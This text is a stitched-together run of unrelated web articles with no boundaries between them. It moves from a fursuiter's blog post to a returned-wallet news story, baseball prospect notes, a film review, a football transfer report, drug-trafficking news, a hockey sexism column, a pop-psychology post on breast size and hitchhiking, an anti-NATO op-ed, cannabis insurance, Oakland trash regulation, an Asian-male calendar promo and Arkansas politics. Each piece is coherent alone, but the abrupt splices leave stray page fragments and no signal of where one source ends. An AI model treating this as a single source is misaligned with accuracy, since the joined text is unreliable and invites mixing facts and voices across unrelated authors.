One of the big decisions when commissioning a fursuit is figuring out what kind of suit you want, and as mentioned in the earlier fursuit article there are different kinds of suits you can have made, and each has their own advantages and disadvantages. I ultimately ended up going with a mini-partial – that is, only the head, hands, and tail are made – partially because the price of mini-partials are cheaper than even a regular partial, and a mini partial would leave the most options open for wearing outfits with Niko. Part of the problem with partials is they often come with feetpaws and furred arm sleeves, and those can restrict what you wear on your feet or arms. And while there are some who find clothes big enough to fit over a full suit, I personally would rather not deal with that if I don't have to – not to mention full suits cost the big bucks.
What kind of outfits do I wear with Niko? Well all kinds actually:
Source: Niko Linni Source: Niko Linni
I started experimenting with some more daring looks however, and it wouldn't be long before I started to don one of my more usual costumes, which I've dubbed “Niko's Club Outfit” which I assembled thanks to Amazon.
So some might be wondering what it's like to don the fursuit and do the furry thing. It's really, really fun! Well, I suppose that's obvious, otherwise why else would I still do it? It is a little tricky when first donning the suit however, as they tend to have very limited range – your perhipheral vision pretty much goes out the window, which means you have to be a lot more careful and take care to watch out for obstacles more than you would without a suit on. Something that you could easily see out of suit becomes something that you have to look down to see with a suit on.
Despite that, it's quite the experience, to me at least. Putting the Niko head on instantly launches me into a different headspace that feels a little different than when I put on other costumes. I suppose the thing is with putting on a fursuit I'm “becoming” the rabbit Niko – I wonder if cosplayers feel the same way when they don their costumes? It's also fun to wear the different costumes as it can help me get in the proper mentality of expressing different sides of Niko: if I want to feel a little more rocker-ish I'll wear the red coat with the black shirt and pants; if I feel like being a little more flirty or effeminate I'll don the Club Outfit; if I just want to be laid back and casual I'll just throw on some regular clothes. It all depends on what I feel up to, really.
One of the other things I love about suiting is how much people seem to like the Niko character, even non-furs get a kick out of fursuits whenever they parade around. I've honestly not had a negative experience fursuiting around nonfurs yet – but we'll see how long that lasts, as it seems lots of fursuiters have at least one story about a child who was too scared to take a picture with a fursuiter. Guess Disneyland isn't the only place where children get scared of the mascot characters!
I can easily see myself continuing to suit for the foreseeable future. I still have loads of fun fursuiting, and Niko isn't the only character of mine I plan to turn into a fursuit. But before I can do that I think I'm going to need a lot more cash.
Have you cosplayed or worn your own fursuit before? What was it like? Have any other questions or comments regarding fursuiting or myself as a fursuiter? Sounds off in the comments below. Thank you for reading, and as always I'll see you all next time.
Advertisements
Like this: Like Loading...
A MAN who lost his wallet containing just over $1000 in cash has had it returned to him 14 years later — with $1900 cash inside it.
Ivica Jerkovic, of Makarska in Osijek-Baranja County in the Republic of Croatia, said he lost his wallet either at a party or when he was driving his friend to a hospital after the party in 2001, Croatian news website 24 Sata reported.
He said the money in the wallet was meant for roof repairs to his home and he had given up thinking about the wallet many years ago.
Then on Friday, he received a package in the mail containing a box with his old wallet, more than $1900 in cash and his personal identification inside.
“I was speechless when I saw what it was,” Jerkovic reportedly said.
“First I thought that someone was joking with me so I went to check whether the money was real.”
He said he believes that the person who took the wallet was “in great financial trouble” at the time but had been able to recover.
“I believe that this money saved him and for years he was calculating how much he should return to me,” he said.
“Otherwise, I don't know why he would keep the wallet for all those years.
“I call on him to contact me. He is the best personal banker in Croatia one can imagine.”
He added he had no anger towards the thief and now wanted to become friends. If the thief was actually a friend, he added they would be even better friends.
“What the thief has done is so great,” he added.
Two weeks' worth of results aren't likely to move the needle much on a pitcher's prospect stock. Plus, one needs a little more information than strikeouts and earned run average to determine that a pitcher has legitimately lifted either his floor or his ceiling.
Which brings us to Alex Reyes: The Cardinals' prospect is ranked third in St. Louis' system according to MLB.com and checks in at No. 100 on the site's Top 100 prospects list. Those rankings are from before the season. Since Opening Day, Reyes has already done enough to likely warrant a spike up both lists, mostly on the strength of a fastball that now touches triple digits.
Reyes has hit 100-plus mph at least a half-dozen times this year through two starts. He's in the upper 90s consistently, too, averaging 98 mph on his heater on Opening Day, according to Palm Beach pitching coach Randy Niemann.
That's a notable jump for Reyes, who has flashed triple digits before but mostly sat 93-to-95 mph in 2014. He's stretched that band to where almost all of his fastballs are coming in at 95-plus mph. That makes him one of the hardest-throwing starting pitchers in the world right now -- Yordano Ventura's 96.2 mph average velocity is the highest among qualified starters in the Majors right now.
Unlike last week's Stock Watch focus, the Orioles' Branden Kline, Reyes' velocity jump is merely a matter of a 20-year-old adding strength. In fact, many observers expected Reyes to add heat with age, although one can't predict that anybody will sit in the upper 90s.
Reyes is more than a live arm at this point, though. While with Class A Peoria in 2014, he and pitching coach Jason Simontacchi targeted two specific areas for Reyes to improve: The first was that Reyes lacked a veteran's routine; then there was his lackluster changeup, which needed dramatic sharpening.
The routine was an easy enough fix, and the 20-year-old now has the habits needed to maintain and improve his repertoire and command throughout a season.
His improved changeup demonstrates Reyes' ability to adapt to coaching and apply lessons. Prior to 2014, the change was clearly Reyes' worst pitch and showed less potential than his blazing fastball or rotation-heavy curve.
With Simontacchi's help, the offspeed offering came a long way last season. In just a few months, it went from a below-average pitch to a consistently average one that sometimes comes in above average.
Niemann, who is coaching Reyes at Class A Advanced Palm Beach this year, didn't see much of Reyes before this spring but had heard within the organization about Reyes' work with Simontacchi. Before he even saw Reyes throw the pitch, he had faith that the changeup could be a weapon for the New Jersey native.
"One question I asked him in Spring Training, because I knew he'd been working on it, was 'Do you throw your changeup to right-handed hitters?'" Niemann said. "His response was exactly what you want to hear from any pitcher, let alone from a young 20-year-old. 'I love throwing it to right-handed hitters.'
"That tells me right there that the maturity and the confidence he has in that pitch is going to make it, to me, not just an average pitch but an above-average changeup. He has an above-average change."
So, we're looking at a triple-digit fastball and an above-average changeup. How about the breaking ball?
Reyes' changeup is more consistent than the curve right now, but his curveball probably has greater potential. He gets plenty of spin on the offering -- what's lacking is consistent location.
This year, learning to command the breaking ball is Reyes' chief goal, and he and Niemann are already hard at work to make it a consistently above-average pitch. Palm Beach manager Oliver Marmol said after Reyes' second start that the curve has improved notably just since Opening Day.
"We talk all the time about how Major League hitters -- they see 95 and above on a nightly basis," Niemann said. "That's not going to bother them a whole lot. What will bother them is if you can change speeds and locate the fastball and throw secondary pitches for strikes behind in the count. Those are the things he's striding toward.
"If we can talk about somebody who has three above-average pitches, you're talking about a wonderful prospect. At 20 years old, to make that statement is fantastic."
Just for reference, MLB.com only had five right-handed pitchers who graded out with plus fastballs and two above-average secondary pitches heading into 2015 -- Lucas Giolito, Noah Syndergaard, Jon Gray, Mark Appel and Eddie Butler, all of whom rate among the game's top 35 prospects. If Reyes' maintains his early improvements, that's the range where fans might expect to find him on prospect lists by year's end.
Two hot…
Mets OF Michael Conforto, Class A Advanced St. Lucie: The Florida State League is supposed to be a tough place to hit, but Conforto is chewing FSL pitching up and spitting it back out -- often over the fence. The Oregon State product hit .435 with a 1.430 OPS from April 14-21. He's hitting .366 with four homers, which is tied for second in the Minors and tops in the FSL this year. The 22-year-old is an advanced hitter, collecting more walks than strikeouts through 11 games. MLB.com puts a 55 on his hit tool and a 60 on his power, though his .338 Minor League average may bump that hit grade up if it continues through 2015.
Brewers LHP Kodi Medeiros, Class A Wisconsin: The southpaw is capable of bringing mid-90s heat with a ton of sink from a low 3/4s delivery. All that movement has given Midwest League hitters fits through two starts. He's recorded 12 strikeouts over 10 1/3 innings, and of the 23 times opponents have put a ball in play against him, 22 went for ground balls. Overall, the Hawaiian has a 0.87 ERA through two outings.
Your browser does not support iframes.
…And one not
Brewers OF Monte Harrison, Class A Wisconsin: Milwaukee's second-round pick from the 2014 Draft is your typical five-tool talent. A two-sport athlete in high school -- he was going to play wide receiver and outfield at Nebraska if he didn't sign -- Harrison has sky-high upside and a sub-basement floor because of his loud-but-raw tools. There's still a lot of time for the 19-year-old to develop, but it's been a slow crawl out of the gate. Through 10 games, the Missouri native has a .118 average with 19 strikeouts in 34 at-bats. His 46.3 strikeout percentage is the sixth highest in all of Minor League Baseball through Monday, and he entered Tuesday mired in a 1-for-16 slump.
The chase sequence–it's a cinematic staple. Nothing is quite as primal and intense as one party in hot pursuit of the other. But, just because a film trope is well-traveled, it doesn't mean that new life can't be injected into its veins every now and again. Well, in the case of Wes Ball's animated short, RUIN, “new life” hasn't just been injected–it's been pile-driven into the bloodstream with the force of a ‘roided-out sledgehammer followed by a chaser of Red Bull.
The story is simple enough. In a post-apocalyptic future, guy finds something he shouldn't. Bad guys catch on. Then, it's off to the races. What results is a chase sequence more thrilling and engaging than any similar set-piece spit out by Hollywood in the last ten years (No, that's not hyperbole, Mr. Bay). The chase is elegantly choreographed with sweeping camera moves and thrilling angles. And, then there's the animation itself. Our main character zips through mangled streets and tunnels with stylish grace. The environments are beautifully constructed, rendered with an almost photo-realistic gloss. This is a world fully realized without the slightest form of exposition or dialogue–a story told through the decaying textures on buildings and the rust of the pursuing enemy fliers. In cinema, imagined apocalyptic futures are usually grey, murky, dystopian settings, but here we are treated to vivid blues and greens. The world is saturated in color, suffocated by fecund vines, sweltering heat, and a haze of buzzing insects.
There is no question that RUIN is a polished work of computer generated art, which really isn't surprising considering its pedigree. The film is put together by OddBall Animation, which was responsible for VFX on last year's popular music video Eye of the Storm, as well as contributions to Chris Milk's impressive interactive music video 3 Dreams of Black. Based out of Los Angeles, RUIN is an incredible technical showpiece for the team, everything is firing on all cylinders here, from the camera work, to the character design, as well as the John Williams-esque musical score.
And, really, that's what RUIN is–a remarkable calling card for a budding animation company. We've seen filmmakers like Fede Alvarez, Ricardo de Montreuil, Jesús Orellana, and most recently, Aaron Sims, break through into Hollywood with visually impressive shorts, and, with over 150,000 Vimeo views in less than 48 hours, I'd say RUIN has successfully drawn itself some attention. Yes, plot may be thin, but when you're moving at a 90 mile-an-hour clip, story structure suddenly becomes irrelevant. Like all great shorts, RUIN leaves you wanting more. This feels like the introductory scene to a great film. You hear, that OddBall animation? A feature films. After all, a guy can dream.
N'Zogbia played 38 games for Wigan last season, scoring 10 goals
Wigan have turned down Aston Villa's offer for winger Charles N'Zogbia, BBC Sport has learned.
Villa manager Alex McLeish is keen on the Frenchman to replace Stewart Downing, who has joined Premier League rivals Liverpool.
But Villa's bid, thought to be around £9m, was not enough to tempt Wigan to sell.
N'Zogbia, 25, has made almost 250 appearances in English football, with Wigan and former club Newcastle United.
McLeish was on the verge of signing N'Zogbia last August when he was in charge of Birmingham City only for the transfer to break down over personal terms.
Wigan owner Dave Whelan has already indicated N'Zogbia will be sold.
"We have to sell Charles N'Zogbia because he's on the last year of his contract," said Whelan.
"We can't keep him if a big club comes for him, and he does deserve a big club because he's that kind of quality player.
N'ZOGBIA AT-A-GLANCE Born May 1986 in Harfleur, France
Signed by Sir Bobby Robson for Newcastle in 2004
Joined Wigan in January 2009
Made France debut in August 2010
Scored nine Premier League goals in 2010/11 as Wigan avoided relegation
"We would love to keep him and pay him what he wants to stay with us but it's a very difficult situation. He's such a great player and we are such a small club sometimes we don't go together."
N'Zogbia started out in English football at Newcastle following his 2004 move from Le Havre.
He moved to Wigan in January 2009 after falling out of favour at St James' Park and was voted player of the season by players and fans in the 2009/10 season.
Last season, he was an integral part of the Wigan squad that avoided relegation from the Premier League on the final day of the season.
The winger has won two caps for France, having made his international debut in the friendly defeat in Norway in August 2010.
SHARE
Brazil authorities have reportedly dismantled an international drug trafficking network that purchased tons of drugs from a Brazilian crime boss jailed in Paraguay, in the latest illustration of how this powerful figure fuels crime and violence within and beyond prison walls.
On August 29, Brazil's federal police carried out “Operation Crown” against a criminal organization that allegedly acquired cocaine directly from Jarvis Chimenes Pavão, a Brazilian drug trafficker serving an eight-year sentence in Paraguay.
Several people were detained in Brazil and Paraguay, many of whom allegedly visited Pavão while he was being held in Tacumbú prison to negotiate the sale of tons of drugs, according to ABC Color. Evidence of this includes photographs of the suspects with Pavão in his “VIP” prison cell, which the inmate had essentially turned into his personal office.
(Footage of Pavão's prison cell, c/o ABC Color)
According to ABC Color, police will now investigate whether the detainees also visited Pavão after he was transferred to a Specialized Police Unit facility in 2016. The inmate is due to be extradited to Brazil in December 2017.
SEE ALSO: InDepth Coverage of Prisons
Brazilian authorities claim the cocaine entered Brazil through Ponta Porã municipality in Mato Grosso do Sul state, along Brazil's southwestern border with Paraguay, before being trafficked and sold in the Serra Gaúcha region of Rio Grande do Sul state, in southern Brazil.
Since March 2017, Brazilian authorities have seized more than 4.6 metric tons of marijuana and cocaine linked to the investigation. The network is estimated to have earned 500,000 Brazilian reais (around $159,000) for each cocaine shipment trafficked.
InSight Crime Analysis
Pavão is on a long list of Latin American criminal bosses who are known to wield power from prison, and this is but the latest scandal illustrating the extent of his control. As well as allegedly running illicit economies, in 2016 Pavão was accused of attempting to spark disturbances across Paraguay's jails in a ploy to block his upcoming extradition to his home country.
SEE ALSO: The Prison Dilemma in the Americas
Pavão's operations also appear to have contributed to a violent turf war beyond prison walls, along the Brazil-Paraguay border. The crime boss has been accused of ordering the June 2016 murder of Jorge Rafaat Toumani, a once prominent Brazilian businessman and top drug trafficker operating in Paraguay's border city of Pedro Juan Caballero. In March 2017, Pavão's brother Ronny was allegedly murdered in retaliation, followed by a series of other homicides.
Pedro Juan Caballero, which lies across the border from Ponta Porã, is on a hotly contested trafficking route where local and Brazilian groups have taken root.
(Photo by ChinaFotoPress/ChinaFotoPress via Getty Images)
The NHL has a “Katy Perry” problem.
Well, at least now they do. When Winnipeg Jets fans serenaded Corey Perry of the Anaheim Ducks with a “Katy Perry” chant during Game 3 of their playoff series, it was treated by some as another comedic gem by the previously infallible crowd, and by others as a more problematic trend in the NHL and the way the League, the media and fans alienate women.
Scroll to continue with content Ad
So Jesse Spector of The Sporting News asked Bettman about that problematic trend at a meeting of Associated Press Sports Editors on Friday, and Bettman's response was unsatisfactory to the point of rage-inducing:
From the Wall Street Journal:
A reporter asked Bettman whether he feared chants of “Katy Perry” directed at Anaheim Ducks star Corey Perry might be off putting to female fans.
Incredulous, Bettman fired back: “You think that's sexist? Taunting chants aren't intended to be sexist.”
[Ed Note: Bettman? Incredulous? THE DEVIL YOU SAY.]
Bettman said the NHL has a track record of “diversity, inclusiveness and doing the right thing.” He noted the league has a bigger female fan base compared to other professional leagues.
He likened the “Katy Perry” insult to calling a goalie a “sieve.”
Another reporter, a woman, noted that “sieves don't have feelings.”
“You don't see how taunting a player by calling them a woman could be sexist?,” she said.
“I see the point but I don't think it's overly literal. Short of gagging everyone who comes to a game I'm not sure we can stifle that,” he said.
And the price of ball-gags grows forever higher! What is the League to do?!
Here's an idea: Acknowledge the problem.
Story continues
Look, I was in public relations. I know the last thing you want to do is actually acknowledge that calling Corey Perry “Katy Perry” might be offensive to a large portion of your paying consumer base. Because then you validate those concerns about sexism in the NHL; and once you validate the concerns, then the heavy lifting starts, which is trying to find ways to assuage them.
It didn't offend me in the least -- I thought it was commentary on facile celebrity rather than challenging Perry's "manhood." But when you toss on the pile with everything else ...
What Bettman and the NHL don't understand is that this joke doesn't exist in isolation. Maybe if it did, it's as frivolous as the rest of the Jets' taunts. But it doesn't.
This exists in a landscape of the Sedin Sisters and Cindy Crosby, of ice girls and cheerleaders eye candy but no male counterparts, of players apologizing for sexist gaffes, of ridiculous items sold at the NHL Store allegedly with women in mind, of Slava Voynov and Semyon Varlamov, of abuse at arenas that's met with apathy from team and facility employees.
It exists in a landscape of the media's making. Of Mike Milbury calling the Swedish twins “Thelma and Louise”, of this recent idiocy from CBS Detroit that ranked the Detroit Red Wings' girlfriends (stalker much?), of the Chicago Tribune's “Chrissy Pronger” poster. Of generally making the “men strong, women weak” thing as much a sports cliché as “giving 110%.” Of having white, male on-air presences as commonplace on broadcasts as corny theme music.
It mostly, and most sadly, exists among fans that don't stick up for each other when someone's being treated like crap because of their gender or sexual identity, or when that person might feel alienated because the rube next to you is asking Claude Giroux where his purse is. We all pick and choose our spots, and we all need to be better with it. (Especially when it comes to making fans new to hockey feel like they're not invited to the party.)
So “Katy Perry” does not exist in a vacuum. Although if she did, it would no doubt be a vacuum that shoots whipped cream, looks like an episode of “Yo Gabba Gabba” and that worked better when Sara Bareilles existed there first …
(See, Katy Perry can be funny, within context!)
You know who Bettman should speak to?
Ken King of the Calgary Flames.
The Calgary Flames have a Red Mile problem. That's the 17th Ave. party that rages during Flames games, and that has become infamous for debauchery, mostly because of the topless women that have been an part of that tradition in previous postseasons.
(To wit, there have been posters seen that read “Show Your Cans for Monahan” this season.)
So the Flames got proactive this week, with King and team president Brian Burke asked Calgarians to knock it off:
“Our view is that if you're a true Flames fan, you are not engaging in this kind of behaviour,” CEO King told the Herald Thursday just before leaving for Vancouver for Game 5 in the playoff series.
“We want to make it clear, do not do this stuff, ever. And for goodness sake don't do it in our name because that's not our culture, that's not our organization."
Flames president of hockey operations Brian Burke added: “This kind of behaviour has nothing to do with us, nothing to do with hockey. This is no way to treat women. I ask that everyone keeps their red on, and treat each other with respect.”
I don't know how the Flames were able to make this plea for their fans to stop being misogynistic, harassing creeps without the use of official NHL fan gags, but somehow they pulled it off.
Unlike the Flames, perhaps Bettman feels all of this is systemic in society, and not an NHL problem. That it's not his place to step up and say anything about it.
Look, I agree Bettman: It's impossible for the NHL to police everything said or done by fans, be it in arenas or online.
But I also don't think anyone's asking for that.
I guess what we're asking for is that the face of the League be as quick to sympathize with women who see the “Katy Perry” thing as another tire on the fire as he is when, say, an owner cries poverty. That the guy running the NHL take a step back and understand the bigger picture here for his female fan base rather than doing what he always does, which is dismissed valid criticisms of the League as being inconsequential.
Like, you know, the last time he was asked about sexism.
Bettman can be a reasonable guy, and he certainly takes action when it makes the NHL look good (see: Voynov, Sean Avery).
Maybe we can start with baby steps, and no longer equate the comparison of Corey Perry to a woman with a goalie to an inanimate object.
MORE FROM YAHOO HOCKEY
While conducting some research for my forthcoming trade book tentatively titled The Consuming Instinct: What Juicy Burgers, Ferraris, , and Gift Giving Reveal About Human Nature (Prometheus Books, 2011), I came across a study authored by Nicolas Guéguen on the likelihood of a female hitchhiker being picked up, by either a male or female driver, as a function of her breast size. On a related note, some of you might recall my recent post on the positive correlation between waitresses' tips and their breast size.
In visiting Nicolas Guéguen's website, I could not help but notice that he possesses a talent for conducting naturalistic experiments about issues that many people have wondered about and yet few (if any) have tested. Recall my earlier post on the likelihood of a woman being approached at a bar as a function of whether she is wearing cosmetics (one of Guéguen's other papers).
Returning to the current paper, Guéguen created one of three naturalistic experimental conditions (corresponding to three breast sizes) using an average looking female confederate: (1) her actual breast size, which was an A cup (i.e., smaller than the French average); (2) a B cup (the average size in France); (3) a C cup (greater than the average). The breast "augmentations" were performed via the addition of a latex implant.
The female confederate then stood at the side of a road and actually hitch hiked (i.e., put out her thumb as cars whizzed by). Two observers coded the number of male and female drivers that drove by along with the number of times that a given driver stopped to pick up the confederate. For obvious security reasons, once a driver stopped, this was counted as an instance of having picked up the hitchhiker. In other words, the confederate did not actually get into any cars. A male observer also hid close by to ensure against any possible threats to the confederate's security.
Here are the results (Table 1, p. 1297):
Cup Size A Cup Size B Cup Size C
Male drivers (n = 774) 40/268 46/256 60/250
(14.92%) (17.79%) (24.00%)
Female drivers (n = 426) 12/132 11/144 14/150
(9.09%) (7.64%) (9.33%)
Statistically speaking, only men's behaviors were affected by the hitchhiker's breast size (p < .03). The frequency of stopping in the cup C condition was marginally greater than that of cup B (p = 0.09) and significantly greater than that of cup A (p < .01). The difference between cups A and B was not significant.
The bottom line: If a woman has large breasts, men are more likely to engage in prosocial behavior (in this case offering her a ride). I suppose that we could have all predicted this fact albeit it is fun to see it tested in a scientific manner. Finally, I am only the messenger so direct your accusations of patriarchal oppression to Dr. Guéguen!
Source for Image:
http://www.limosinasvip.com/modelos/images/1655-sexy-hitchhiker.jpg
In the past dozen years, the armed forces of NATO countries, whether operating under the NATO banner or in related ad-hoc coalitions, have killed many hundreds of thousands of people. Of those hundreds of thousands of people, only a few hundred at most ever had any connection to any attack on a NATO country.
Whatever modern NATO has become, a defensive alliance it is not; that fact is beyond rational dispute.
It is also the case that the situation in countries where NATO has been most active in killing people, including Iraq, Libya, Afghanistan and Pakistan, has deteriorated. It has deteriorated politically, economically, militarily and socially. The notion that NATO member states could bomb the world into good was only ever believed by crazed and fanatical people like Tony Blair and Jim Murphy of the Henry Jackson Society. It really should not have needed empirical investigation to prove it was wrong, but it has been tried, and has been proved wrong.
The NATO states as a group have also embarked on remarkably similar reductions in the civil liberties of their own populations during this period. NATO to me is symbolized by the fact that its Secretary General, Anders Fogh Rasmussen, as Danish Prime Minister blatantly lied to the Danish parliament about Iraqi Weapons of Mass Destruction. When Major Frank Grevil released material that proved Rasmussen was lying, it was Grevil who was jailed for three years. In the United States, no CIA operative has been prosecuted for their widespread campaign of torture, but John Kiriakou is in jail for revealing it.
NATO's attempt to be global arbiter and enforcer has been disastrous at all levels. Its plan to redeem itself by bombing the Caliphate in Iraq and Syria is a further sign of madness. Except of course that it will guarantee some blowback against Western targets, and that will “justify” further bombings, and yet more profit for the arms manufacturers. On that level, it is very clever and cynical. NATO provides power to the elite and money to the wealthy.
But what of Putin's Russia, I hear you say? I am no fan of Putin – I think he is a nasty, dangerous little dictator. But little is the operative word.
Russia is not a great power. Its GDP is 10% of the GDP of the EU. Its economy is the same size as Italy's. The capabilities of Russia's armed forces are massively exaggerated by the security industry, including the security services, and by arms manufacturers. The entire area of Eastern Ukraine which Russia is disputing has a GDP smaller than the city of Dundee.
Russia is only any kind of “military threat” because of its nuclear arsenal. The way forward to peace is active international nuclear disarmament – and the existence of NATO is the greatest obstacle to that. The idea that almost the entire developed world needs to encircle and contain Russia with massive military threat, is as sensible as the idea that it needs to encircle the UK or France – both of which have substantially larger and more diversified economies than Russia and much larger and more technologically advanced arms industries.
NATO is by far the largest danger to world peace. It should be dissolved as a matter of urgency.
Craig Murray is an author, broadcaster, human rights activist, and former diplomat. He was British Ambassador to Uzbekistan from August 2002 to October 2004 and Rector of the University of Dundee from 2007 to 2010. The article is reprinted with permission from his website.
Read more by Craig Murray
1 of 1 2 of 1
One of Canada's biggest banks has a message for cannabis users who might be tempted to lie about their consumption for insurance purposes.
"Smoke pot? Do I tell tell my insurer?" reads a headline on an article in the Royal Bank of Canada's (RBC) insurance website.
According to RBC, the "high stakes" of applying for various types of insurance might compel cannabis users to lie in policy applications because they're afraid they'll be denied.
As Canada gets closer to the legalization of cannabis, insurers have a vested interest in tweaking their policies to be more inclusive of cannabis users, but not all have done so.
While RBC reports that some insurers have made changes based on studies that have shown cannabis use to be "relatively" safe, others still charge cannabis users higher rates, which are often reflective of surcharges applied to cigarette smokers.
"If you find an insurer who doesn't have a marijuana surcharge — you won't have to pay extra for your insurance because of your usage," it says.
But RBC reports that frequent users insured with companies that do apply surcharges for marijuana use will pay up to 40 percent more, depending on which provider they might be using.
Addressing the risks associated with lying about use, the institution says falsifying information isn't the way to go: in the event that an insurer requires an applicant to take a blood or urine test and the results of that test counter the information provided in an application, the policy could be voided.
Policies can also be contested or rescinded if an insurer thinks an applicant is being dishonest, which can result in a denial of claims.
All this is to say, honesty seems to be the best policy.
Humans are ‘programmed' to believe in God and the supernatural, scientific researchers have found.
A study into the way children's brains develop suggests that beliefs in the supernatural are present from birth.
The findings of Bruce Hood, professor of developmental psychology at Bristol University, challenge the claims of atheists such as Richard Dawkins.
Professor Dawkins' assertion that religious belief is a result of poor education and ‘indoctrination' is well known.
Professor Hood said: “Our research shows children have a natural, intuitive way of reasoning that leads them to all kinds of supernatural beliefs about how the world works.”
Other academics have said that their research supports Prof Hood's findings.
In the science journal Nature, Washington University anthropologist Professor Pascal Boyer said: “Religious thinking seems to be the path of the least resistance for our cognitive systems”.
“By contrast, disbelief is generally the work of deliberate, effortful work against our natural cognitive dispositions — hardly the easiest ideology to propagate.”
Speculating as to why their research showed religious belief to be ‘hardwired', Prof Hood and his colleagues offered an evolutionary reason.
They suggest that in the past, shared religious beliefs brought social benefits as believers cooperated to ensure mutual survival, while atheist societies lacked such beneficial cohesion.
OAKLAND — Despite the millions the city spends on a campaign to keep trash from flowing into the bay even regulators deem “progressive,” its efforts are falling short of state requirements.
Unless Oakland can come up with more effective plans and the funding to pay for them, the city faces fines for allowing too many pollutants into its stormwater.
By July 1, Oakland and 69 other cities and government agencies in the region are supposed to reduce the amount of trash they wash into the bay by 75 percent from 2009 levels.
“We're not going to make that first compliance target. We're not going to be close,” Oakland Public Works' Lesley Estes said at a public works committee meeting in late April. But the city is not alone, she said.
Last year, when the reduction target was 60 percent, the State Water Resources Board calculated that the city reduced its trash production by 44.6 percent. Oakland avoided potential fines of $10 per excess gallon by negotiating a plan for ramping up its efforts.
Estes estimates Oakland will have a 15 percent higher rating for its trash reduction efforts this year, bringing it close to 60 percent less than 2009's output. That is not enough to meet this year's target, but a substantial improvement over last year.
“We're all struggling to make this happen,” Estes said, citing Berkeley, San Leandro, Albany, Alameda, Richmond and San Jose as also falling below the target rate. Last year, 25 other cities and agencies fell short. This year, that number has grown to 43, Estes said.
“They've been going after it pretty aggressively and dealing with it with a lot of initiative,” the agency's Dale Bowyer said of Oakland's efforts.
“I would characterize their efforts as progressive. But Oakland has serious challenges,” Bowyer said.
In an interview, Estes estimated the city spends $12 million to $14 million to clean up trash and keep it out of storm drains.
Those efforts include combating illegal dumping, street sweeping, banning styrofoam packaging and plastic shopping bags, cleaning up homeless encampments, conducting volunteer cleanup campaigns and investing in infrastructure.
But Oakland “is being seen as a struggling city that needs to do more,” she told the committee.
The city takes issue with some of the water board's ways of calculating its efforts. The board discounts Oakland's street sweeping program because it was in place before the permit guidelines were issued, for example.
Volunteer cleanup programs earn the city more credit toward compliance targets than both street sweeping and efforts to reduce illegal dumping, Estes said.
In meetings with water board staff, she said, the city intends to develop an alternate plan, which she hopes will be agreed upon by early 2018, with strategies and the means to pay for them made clear. Such arrangements spared the city from being penalized last year.
To blame the regulations “is sort of like sticking your head in the sand,” said David Lewis, executive director of the nonprofit Save the Bay
“There is no such thing as an alternative plan,” he said at the meeting.
“We want to help the city succeed. We know the regulations; we helped the water board write them,” he said.
The city has two new hydrodynamic separator units paid for with money from a bond voters approved last year. The $1.5 million to $2 million devices are an addition to the city's 30 mesh screen systems in storm drains that trap trash.
In her preliminary budget proposal, Mayor Libby Schaaf cited the financial risks that not meeting state water quality requirements pose for the city's coffers. Beyond potential fines, the city could face third-party lawsuits, such as one that cost San Jose $100 million to settle last year.
But in the budget proposal presented to the council, every watershed infrastructure improvement is unfunded, as council member Dan Kalb pointed out in budget deliberations at the May 16 council meeting.
The committee asked for more details about the city's exposure to fines if it cannot meet the 70 percent trash reduction target, for measures the council could consider in upcoming budget deliberations and a timeline for the work.
The topic will be revisited Tuesday at the public works committee's meeting, at 11:30 a.m. at City Hall.
Nov 24, 2017 Ξ Comments are off
Still looking for that perfect stocking stuffer for someone who turns up a nose at the notion of dating Asian guys?
The Haikus for Hotties 2018 calendar is now taking orders. This is the third year this special calendar is being offered. Part spoof, part social commentary, it actually works as a calendar.
Haikus With Hotties is a calendar series that highlights the attractive and talented Asian men in media that often don't get as much attention as they deserve.
The calendar counters the popular stereotype that attempts to emasculate Asian men: they can't be sexy, they can't be romantic, they aren't attractive. Or, to reference Steve Harvey, they aren't datable.
Haikus With Hotties is a series that celebrates Asian male hotness in all forms, mainly shirtless and lots of six-pack abs.
After the series launched in 2013 with Godfrey Gao, “Haikus With Hotties” released its first calendar in 2016 after a successful Kickstarter campaign featuring Yoshi and Peter Sudarso. 2017 brought a second calendar with a new twist: “From the makers of Haikus With Hotties now comes Haikus *On* Hotties.”
For 2018, the fans have been invited to participate in the fun and write Haikus *For* Hotties. What started out as a joke has become a nice excuse to feature a variety of Asian American men doing interesting things in the media.
For more information, visit www.haikuswithhotties.com.
AsAmNews has Asian America in its heart. We're an all-volunteer effort of dedicated staff and interns. You can show your support by liking our Facebook page at www.facebook.com/asamnews, following us on Twitter, sharing our stories, interning or joining our staff.
There is one thing that Republicans and Democrats in Arkansas might agree on: Northeast Arkansas could make or break both parties' 2014 fortunes.
David Ray, communications director for Senate candidate Cong. Tom Cotton, R-Dardanelle, said the area has changed politically in the past several years.
“Historically, Northeast Arkansas has always been solidly Democratic. But you have seen since 2010, a strong shift in party preference,” Ray said. “There has not been a shift in ideology. Northeast Arkansas has always been conservative. But with the Democrats in Washington, they (local Democrats) do not recognize their values.”
Former Democratic Senator David Pryor, who was in Jonesboro, Newport and Paragould last month to campaign for his son, Sen. Mark Pryor, D-Little Rock, said the area has been receptive to the Democratic message.
David Pryor and his wife, Barbara, went to local senior centers and civic clubs to meet with potential voters.
“There is not much question it is a battleground,” the elder Pryor said. “It is a part of Arkansas that is vibrant and prospering. There is a lot of energy and a lot of young people with new ideas.”
Both Ray and David Pryor said the two Senate campaigns will definitely be looking to Northeast Arkansas as a possible path to victory this fall.
“We have campaigned relentlessly here,” Ray said. “We have been to Jonesboro at least a dozen times, Lake City, Mississippi County, Poinsett County, Sharp County and Independence County. It shows at least how important (the region) is to our campaign. We have also had a field operation and have knocked on doors since January.”
“(Today's campaign) is different with electronic, Facebook and Twitter. We do a lot of door-to-door, street-by-street,” Pryor said. “We have worked on a 75 organized county approach, with phone banks and walking through neighborhoods. We have also had a large number of volunteers.”
NEA BATTLEGROUND
A map released last year by Republican consultant Clint Reed with Little Rock-based Impact Management Group measures political strength by county. Reed's analysis showed that Craighead, Cross, Greene, Independence and Sharp counties are considered “purple,” or toss-up, counties this year.
“These counties have a tendency to split their preference between Republican and Democrat. How these counties break in 2014 could very well determine which political party controls the U.S. Senate or who the next governor is,” said Reed, who was part of a June panel at the Northeast Arkansas Political Animals Club.
Each of those “purple” counties have some sort of county race this year. Craighead, Cross, Greene and Sharp have contested county judge races this year, while each have five justice of the peace races. Turnout will also be boosted in these and other Northeast Arkansas counties by an abnormally high number of municipal races, especially for mayor.
As for statewide races, most if not all candidates on the ballot have spent time in those counties this year. The two top candidates for governor – Republican Asa Hutchinson and Democrat Mike Ross – campaigned at July 4th events in Corning, Piggott and Caraway and are scheduled to make more appearances in the coming weeks.
